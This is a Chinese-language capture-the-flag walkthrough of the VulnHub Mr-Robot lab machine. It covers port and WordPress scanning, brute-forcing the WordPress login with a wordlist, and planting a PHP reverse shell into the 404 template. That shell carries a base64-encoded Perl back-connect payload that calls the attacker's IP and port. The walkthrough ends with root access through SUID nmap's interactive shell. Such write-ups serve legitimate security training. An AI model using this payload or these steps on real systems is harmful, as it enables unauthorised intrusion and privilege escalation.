vulnhub----Mr.root

靶机下载地址:https://download.vulnhub.com/mrrobot/mrRobot.ova.torrent

这次靶机的名称是Mr.root

kali:192.168.100.8

Win7:192.168.100.9

==================================================================================================

信息收集

扫描下靶机的IP地址:

 nmap -sP 192.168.100.0/24

vulnhub----Mr.root_第1张图片

可以看出靶机的IP地址为192.168.100.13

然后在用nmap -p 1-65535 192.168.100.13 对目标靶机进行端口扫描

vulnhub----Mr.root_第2张图片

我们先从80开始下手

网页动画就是linux开机登陆的过程,到后面会给你提供几个命令

vulnhub----Mr.root_第3张图片

 

我们看下他的robots.txt

http://192.168.100.13/robots.txt

打开fsocity.dic有点像一个爆破的字典

vulnhub----Mr.root_第4张图片

我们下载过来并去重保存

wget http://192.168.100.13/fsocity.dic

cat fsocity.dic | sort | uniq > fsocity_sorted.dic

 

再打开key-1-of-3.txt 

得到:

073403c8a58a1f80d943455fb30724b9

然后尝试用MD5解密,但是照不出结果

 

然后我们再用nikto扫描下靶机的漏洞

nikto -h 192.168.100.13

root@kali:~# nikto -h 192.168.100.13
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.100.13
+ Target Hostname:    192.168.100.13
+ Target Port:        80
+ Start Time:         2018-12-02 15:10:03 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad 
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'link' found, with contents: ; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ 7535 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time:           2018-12-02 15:12:36 (GMT8) (153 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

其中有包括大量的wp的信息

 

同样你可以使用nmap来扫描得到路径

nmap -Pn -n -p80 --script http-enum 192.168.100.13

root@kali:~# nmap -Pn -n -p80 --script http-enum 192.168.100.13
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-02 15:40 CST
Nmap scan report for 192.168.100.13
Host is up (0.00029s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-enum: 
|   /admin/: Possible admin folder
|   /admin/index.html: Possible admin folder
|   /wp-login.php: Possible admin folder
|   /robots.txt: Robots file
|   /readme.html: Wordpress version: 2 
|   /feed/: Wordpress version: 4.3.17
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|   /readme.html: Interesting, a readme.
|   /0/: Potentially interesting folder
|_  /image/: Potentially interesting folder
MAC Address: 08:00:27:26:9E:38 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 38.05 seconds
 

那么我们用wpsacn工具看看能不能找到更多有用的信息

wpscan --url 192.168.100.13 -e vp

root@kali:~# wpscan --url 192.168.100.13 -e vp
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.4
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.100.13/
[+] Started: Sun Dec  2 15:18:48 2018

[+] Interesting header: SERVER: Apache
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] Interesting header: X-MOD-PAGESPEED: 1.9.32.3-4523
[+] robots.txt available under: http://192.168.100.13/robots.txt   [HTTP 200]
[+] XML-RPC Interface available under: http://192.168.100.13/xmlrpc.php   [HTTP 405]

[+] Enumerating WordPress version ...
[!] The WordPress 'http://192.168.100.13/readme.html' file exists exposing a version number

[+] WordPress version 4.3.17 (Released on 2018-07-05) identified from links opml

[+] Enumerating installed plugins (only ones with known vulnerabilities) ...

   Time: 00:00:38 <====================================================================================================> (1671 / 1671) 100.00% Time: 00:00:38

[+] We found 8 plugins:

[+] Name: akismet
 |  Latest version: 4.1 
 |  Last updated: 2018-11-12T19:38:00.000Z
 |  Location: http://192.168.100.13/wp-content/plugins/akismet/

[!] We could not determine the version installed. All of the past known vulnerabilities will be output to allow you to do your own manual investigation.

[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8215
    Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
    Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5

[+] Name: all-in-one-seo-pack - v2.0.4
 |  Last updated: 2018-10-24T22:24:00.000Z
 |  Location: http://192.168.100.13/wp-content/plugins/all-in-one-seo-pack/
 |  Readme: http://192.168.100.13/wp-content/plugins/all-in-one-seo-pack/readme.txt
[!] The version is out of date, the latest version is 2.9.1

[!] Title: All in One SEO Pack <= 2.1.5 - aioseop_functions.php new_meta Parameter XSS
    Reference: https://wpvulndb.com/vulnerabilities/6888
    Reference: http://blog.sucuri.net/2014/05/vulnerability-found-in-the-all-in-one-seo-pack-wordpress-plugin.html
[i] Fixed in: 2.1.6

[!] Title: All in One SEO Pack <= 2.1.5 - Unspecified Privilege Escalation
    Reference: https://wpvulndb.com/vulnerabilities/6889
    Reference: http://blog.sucuri.net/2014/05/vulnerability-found-in-the-all-in-one-seo-pack-wordpress-plugin.html
[i] Fixed in: 2.1.6

[!] Title: All in One SEO Pack <= 2.2.5.1 - Information Disclosure
    Reference: https://wpvulndb.com/vulnerabilities/7881
    Reference: http://jvn.jp/en/jp/JVN75615300/index.html
    Reference: http://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0902
[i] Fixed in: 2.2.6

[!] Title: All in One SEO Pack <= 2.2.6.1 - Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7916
    Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
[i] Fixed in: 2.2.6.2

[!] Title: All in One SEO Pack <= 2.3.6.1 - Unauthenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8538
    Reference: http://seclists.org/fulldisclosure/2016/Jul/23
    Reference: https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
    Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html
    Reference: https://wptavern.com/all-in-one-seo-2-3-7-patches-persistent-xss-vulnerability
    Reference: https://www.wordfence.com/blog/2016/07/xss-vulnerability-all-in-one-seo-pack-plugin/
[i] Fixed in: 2.3.7

[!] Title: All in One SEO Pack <= 2.3.7 -  Unauthenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8558
    Reference: https://www.wordfence.com/blog/2016/07/new-xss-vulnerability-all-in-one-seo-pack/
    Reference: https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
[i] Fixed in: 2.3.8

[+] Name: all-in-one-wp-migration - v2.0.4
 |  Last updated: 2018-11-22T10:17:00.000Z
 |  Location: http://192.168.100.13/wp-content/plugins/all-in-one-wp-migration/
 |  Readme: http://192.168.100.13/wp-content/plugins/all-in-one-wp-migration/readme.txt
[!] The version is out of date, the latest version is 6.80

[!] Title: All-in-One WP Migration <= 2.0.4 - Unauthenticated Database Export
    Reference: https://wpvulndb.com/vulnerabilities/7857
    Reference: http://www.pritect.net/blog/all-in-one-wp-migration-2-0-4-security-vulnerability
    Reference: https://www.rapid7.com/db/modules/auxiliary/gather/wp_all_in_one_migration_export
[i] Fixed in: 2.0.5

[!] Title: All-in-One WP Migration <= 6.45 - Reflected Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8851
    Reference: https://wordpress.org/plugins/all-in-one-wp-migration/#developers
[i] Fixed in: 6.46

[+] Name: contact-form-7 - v4.1
 |  Last updated: 2018-10-29T23:58:00.000Z
 |  Location: http://192.168.100.13/wp-content/plugins/contact-form-7/
 |  Readme: http://192.168.100.13/wp-content/plugins/contact-form-7/readme.txt
[!] The version is out of date, the latest version is 5.0.5

[!] Title: Contact Form 7 <= 5.0.3 - register_post_type() Privilege Escalation
    Reference: https://wpvulndb.com/vulnerabilities/9127
    Reference: https://contactform7.com/2018/09/04/contact-form-7-504/
    Reference: https://plugins.trac.wordpress.org/changeset/1935726/contact-form-7
    Reference: https://plugins.trac.wordpress.org/changeset/1934594/contact-form-7
    Reference: https://plugins.trac.wordpress.org/changeset/1934343/contact-form-7
    Reference: https://plugins.trac.wordpress.org/changeset/1934327/contact-form-7
[i] Fixed in: 5.0.4

[+] Name: google-analytics-for-wordpress - v5.3.2
 |  Last updated: 2018-11-27T18:47:00.000Z
 |  Location: http://192.168.100.13/wp-content/plugins/google-analytics-for-wordpress/
 |  Readme: http://192.168.100.13/wp-content/plugins/google-analytics-for-wordpress/readme.txt
[!] The version is out of date, the latest version is 7.3.2

[!] Title: Google Analytics by Yoast <= 5.3.2 - Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7838
    Reference: http://packetstormsecurity.com/files/130716/
[i] Fixed in: 5.3.3

[!] Title: Google Analytics by Yoast <= 5.3.2 - Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7856
    Reference: https://yoast.com/ga-plugin-security-update-more/
    Reference: http://klikki.fi/adv/yoast_analytics.html
    Reference: http://packetstormsecurity.com/files/130935/
[i] Fixed in: 5.3.3

[!] Title: Google Analytics by Yoast <= 5.3.3 - Unauthenticated Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7914
    Reference: https://yoast.com/coordinated-security-release/
    Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
    Reference: http://klikki.fi/adv/yoast_analytics2.html
[i] Fixed in: 5.4

[!] Title: Google Analytics by Yoast <= 5.4.4 - Authenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8147
    Reference: https://security.dxw.com/advisories/xss-in-google-analytics-by-yoast-premium-by-privileged-users/
[i] Fixed in: 5.4.5

[+] Name: google-sitemap-generator - v4.0.7.1
 |  Last updated: 2018-04-25T15:06:00.000Z
 |  Location: http://192.168.100.13/wp-content/plugins/google-sitemap-generator/
 |  Readme: http://192.168.100.13/wp-content/plugins/google-sitemap-generator/readme.txt
[!] The version is out of date, the latest version is 4.0.9

[!] Title: Google XML Sitemaps <= 4.0.8 - Authenticated Reflected XSS (via HOST header)
    Reference: https://wpvulndb.com/vulnerabilities/8762
    Reference: https://plugins.trac.wordpress.org/browser/google-sitemap-generator/trunk/sitemap-ui.php#L1310
[i] Fixed in: 4.0.9

[+] Name: jetpack - v3.3.2
 |  Last updated: 2018-11-27T11:01:00.000Z
 |  Location: http://192.168.100.13/wp-content/plugins/jetpack/
 |  Readme: http://192.168.100.13/wp-content/plugins/jetpack/readme.txt
[!] The version is out of date, the latest version is 6.8

[!] Title: Jetpack 3.0-3.4.2 - Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7915
    Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
    Reference: https://jetpack.me/2015/04/20/jetpack-3-4-3-coordinated-security-update/
[i] Fixed in: 3.4.3

[!] Title: Jetpack <= 3.5.2 - Unauthenticated DOM Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7964
    Reference: https://blog.sucuri.net/2015/05/jetpack-and-twentyfifteen-vulnerable-to-dom-based-xss-millions-of-wordpress-websites-affected-millions-of-wordpress-websites-affected.html
[i] Fixed in: 3.5.3

[!] Title: Jetpack <= 3.7.0 - Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8201
    Reference: https://jetpack.me/2015/09/30/jetpack-3-7-1-and-3-7-2-security-and-maintenance-releases/
    Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-jetpack.html
[i] Fixed in: 3.7.1

[!] Title: Jetpack <= 3.7.0 - Information Disclosure
    Reference: https://wpvulndb.com/vulnerabilities/8202
    Reference: https://jetpack.me/2015/09/30/jetpack-3-7-1-and-3-7-2-security-and-maintenance-releases/
[i] Fixed in: 3.7.1

[!] Title: Jetpack <= 3.9.1 - LaTeX HTML Element XSS
    Reference: https://wpvulndb.com/vulnerabilities/8472
    Reference: https://jetpack.com/2016/02/25/jetpack-3-9-2-maintenance-and-security-release/
    Reference: https://github.com/Automattic/jetpack/commit/dbc33b9105c4dbb0de81544e682a8b6d5ab7e446
[i] Fixed in: 3.9.2

[!] Title: Jetpack 2.0-4.0.2 - Shortcode Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8500
    Reference: https://jetpack.com/2016/05/27/jetpack-4-0-3-critical-security-update/
    Reference: http://wptavern.com/jetpack-4-0-3-patches-a-critical-xss-vulnerability
    Reference: https://blog.sucuri.net/2016/05/security-advisory-stored-xss-jetpack-2.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10706
[i] Fixed in: 4.0.3

[!] Title: Jetpack <= 4.0.3 - Multiple Vulnerabilities
    Reference: https://wpvulndb.com/vulnerabilities/8517
    Reference: https://jetpack.com/2016/06/20/jetpack-4-0-4-bug-fixes/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10705
[i] Fixed in: 4.0.4

[+] Name: wptouch - v3.7.3
 |  Last updated: 2018-11-21T19:54:00.000Z
 |  Location: http://192.168.100.13/wp-content/plugins/wptouch/
 |  Readme: http://192.168.100.13/wp-content/plugins/wptouch/readme.txt
[!] The version is out of date, the latest version is 4.3.34

[!] Title: WPtouch Mobile Plugin <= 3.7.5.3 - Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7920
    Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
[i] Fixed in: 3.7.6

[+] Finished: Sun Dec  2 15:19:36 2018
[+] Elapsed time: 00:00:47
[+] Requests made: 2110
[+] Memory used: 135.586 MB
 

枚举靶机wp中易受到攻击的插件,但是最后利用失败

 

我们访问下/wp-admin

尝试默认的账号密码admin/admin

vulnhub----Mr.root_第5张图片

出错 

在这里我用burp爆破下用户名,字典就是之前整理好的fsocity_sorted.dic字典

 

抓下登录的post包,然后对username进行爆破,密码随意。

结果如下

vulnhub----Mr.root_第6张图片

我们账号用elliot当账号去登陆

vulnhub----Mr.root_第7张图片

出现的提示着这样的,说明elliot这个账号是可以用的

 

然后我们把username用elliot代替,对password再用这个字典进行爆破结果如下

vulnhub----Mr.root_第8张图片

然后成功进入后台

vulnhub----Mr.root_第9张图片

同样的你也可以用wpscan爆破

wpscan --url http://192.168.100.13 --wordlist=/root/fsocity_sorted.dic --username elliot --threads 20

 vulnhub----Mr.root_第10张图片

 

登陆后台后选择

vulnhub----Mr.root_第11张图片

利用php反弹shell

'perl','c'=>'c'); 
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". 
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". 
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". 
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". 
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". 
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". 
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
cf('/tmp/.bc',$back_connect); 
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &"); 
?> 

然后用kali进行nc监听

更新404页面后,在博客上随便访问个不存在的页面来触发反弹代码

然后我们ls下看下有什么文件

vulnhub----Mr.root_第12张图片 

 

没什么信息 我们取home目录看下

vulnhub----Mr.root_第13张图片

 

这里有第2个key,但是我们没有读的权限,只有robot能看

下面有个md5文件,我们可以读

然后我们取解密下这段

vulnhub----Mr.root_第14张图片

 

解密结果:abcdefghijklmnopqrstuvwxyz

那么我们就可以切换到root身份然后读取那个文件了

但是输入密码需要tty,方法有很多这里我用python的方法

vulnhub----Mr.root_第15张图片

得到key2

822c73956184f694993bede3eb39f959

 

接下来就是提权

检查下靶机的内核信息

有了这些信息,我前往https://www.exploit-db.com/并寻找一些我可以使用的权限升级漏洞。我尝试了OFS [CVE-2015-1328]和recvmsg [CVE-2014-0038]漏洞利用程序,但都未能获得root权限。

试下别的方法提升权限

找下系统中所有suid文件

vulnhub----Mr.root_第16张图片

这里有个nmap,就会想到一个经典的利用nmap的

较旧版本的Nmap(2.02至5.21)具有交互模式,允许用户执行shell命令。由于Nmap在使用root权限执行的二进制文件列表中,因此可以使用交互式控制台来运行具有相同权限的shell。

查看下nmap版本

vulnhub----Mr.root_第17张图片

进入Nmap交互模式

nmap --interactive

vulnhub----Mr.root_第18张图片

以下命令将提供一个提升的shell。

!sh

vulnhub----Mr.root_第19张图片

现在我有root访问权限,我运行了以前用来尝试查找所有与密钥文件(find / -name 'key-*-of-3.txt' 2>/dev/null)的命名模式相匹配的文件的命令

find / -name 'key-*-of-3.txt' 2>/dev/null

vulnhub----Mr.root_第20张图片

 

你可能感兴趣的:(CTF以及各类靶机,VULHUB靶场题解集合)